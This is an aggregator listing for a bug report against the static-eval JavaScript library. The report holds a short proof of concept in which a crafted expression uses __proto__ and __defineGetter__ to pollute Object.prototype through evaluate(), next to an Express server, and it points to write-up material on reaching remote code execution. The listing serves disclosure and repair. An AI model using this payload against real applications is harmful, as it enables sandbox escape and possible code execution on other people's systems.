Sandbox Escape
Nobody has claimed this yet.
Assessment
- Difficulty
- 5/5
- Estimated time
- Over a week
- Newbie friendliness
- 20/100
- Issue type
- Bug
- Clarity
- Needs clarification
- Activity status
- Stale
- Tech stack
- javascript
- Domain
- security
Research direction
The report provides a JavaScript PoC using static-eval and esprima.parse, with the exploit triggered at evaluate(ast); start by reproducing that expression and reviewing the linked sandbox-escape details. Done means the reported prototype-pollution path no longer escapes evaluation or executes unintended code, with regression coverage added in the project’s test suite.
Written by the indexing model from the issue text.
Description
poc
// make pollution
const evaluate = require('static-eval');
const parse = require('esprima').parse;
var src = `({})['__proto__']['__defineGetter__']('toString', ({})['constructor'])`
var ast = parse(src).body[0].expression;
evaluate(ast);
// serve webapp
const express = require('express');
const app = express();
app.get('/', (req, res) => {
res.end('working!');
});
app.listen(8080);
details in
https://blog.p6.is/bypassing-a-js-sandbox/#Prototype-Pollution-to-Remote-Code-Execution
- Dominant language
- JavaScript
- Stars
- 177
- Forks
- 27
- PR merge metrics
- No merged PRs in 30d
Contributor guide
No contributing guide indexed for this repository
First steps
- Read the whole issue, then the project's contributing guide.
- Comment on the issue to say you are picking it up — it saves two people doing the same work.
- Fork the repository and make your change on a branch.
- Open a pull request that references the issue number.
More from browserify/static-eval
-
CVE in word-wrap Open
Difficulty 3/5 1-2 days Newbie friendliness 35/100
browserify/static-eval#42 · 1 comment · 2 reactions ·
-
Difficulty 4/5 3-5 days Newbie friendliness 25/100
browserify/static-eval#41 · 1 comment ·
-
Difficulty 3/5 1-2 days Newbie friendliness 35/100
browserify/static-eval#39 ·
-
Difficulty 3/5 1-2 days Newbie friendliness 48/100
browserify/static-eval#38 ·
-
Difficulty 4/5 3-5 days Newbie friendliness 25/100
browserify/static-eval#34 · 20 comments · 3 reactions ·
All issues in browserify/static-eval
Similar issues
-
Difficulty 2/5 1-3 hours Newbie friendliness 88/100
HarperFast/skills#96 ·
-
[Block] Latest Posts [Type] Bug
Difficulty 2/5 1-3 hours Newbie friendliness 76/100
-
Difficulty 2/5 1-3 hours Newbie friendliness 78/100
Automattic/studio#4908 ·
-
Difficulty 2/5 1-3 hours Newbie friendliness 74/100
-
Difficulty 2/5 1-3 hours Newbie friendliness 86/100
sugarlabs/musicblocks#8847 ·